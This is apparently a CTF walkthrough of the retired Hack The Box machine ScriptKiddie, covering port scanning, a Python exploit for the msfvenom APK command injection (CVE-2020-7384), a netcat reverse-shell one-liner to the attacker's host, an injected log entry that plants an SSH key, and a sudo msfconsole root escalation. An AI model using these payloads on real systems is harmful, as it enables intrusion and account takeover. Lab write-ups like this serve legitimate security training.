This post documents the complete walkthrough of ScriptKiddie, a retired vulnerable VM created by 0xdf, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

ScriptKiddie is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.226 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-02-09 08:31:53 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226
rate:  0.00-kpps, 100.00% done, waiting -150-secs, found=2

Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p22,5000 -A --reason 10.10.10.226 -oN nmap.txt
...
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: OPTIONS GET POST HEAD
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

Let’s check out the http service and see what we get.

Looks good!

Metasploit Framework 6.0.11 - msfvenom APK template command injection

Here’s our first clue.

Here’s our exploit.

I modify the exploit slightly to suit my purpose like a true scriptkiddie. :wink:

exploit.py
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
import sys

# Change me
payload = sys.argv[1]

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = "./"
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")

os.remove(empty_file)
os.remove(keystore_file)

Time to generate our payload.

rm -rf /tmp/p; mkfifo /tmp/p; bash </tmp/p | nc 10.10.16.125 1234 >/tmp/p

Load it up in the online msfvenom generator.

And watch a reverse shell appears on your netcat listener.

The file user.txt is at kid’s home directory.

Privilege Escalation

During enumeration of kid’s account, I notice the presence of another account: pwn. And pwn appears to be running some kind of script.

This is what the script looks like.

Note: I found out later that pwn is using incron to execute scanlosers.sh when the file /home/kid/logs/hackers opened for writing is closed.

From kid to pwn

A command injection vulnerability appears to be present in scanlosers.sh. Notice cut only cuts the first two fields leaving the rest of the fields intact? Furthermore, pwn has write access to /home/kid/logs/hackers as shown above. Let’s echo a SSH public key we control to /home/pwn/.ssh/authorized_keys in kid’s shell like so.

echo "1 2 ; rm -rf /home/pwn/.ssh/authorized_keys && echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILX1GQuhaRzWOcA4+b26Az8EGvY4puh6jBkex9QuHiNS >> /home/pwn/.ssh/authorized_keys #" >> logs/hackers

And there you have it.

GTFOBin - msfconsole

Surprise mother, father…

pwn is able to sudo msfconsole!

That is as good as having a root shell.

:dancer: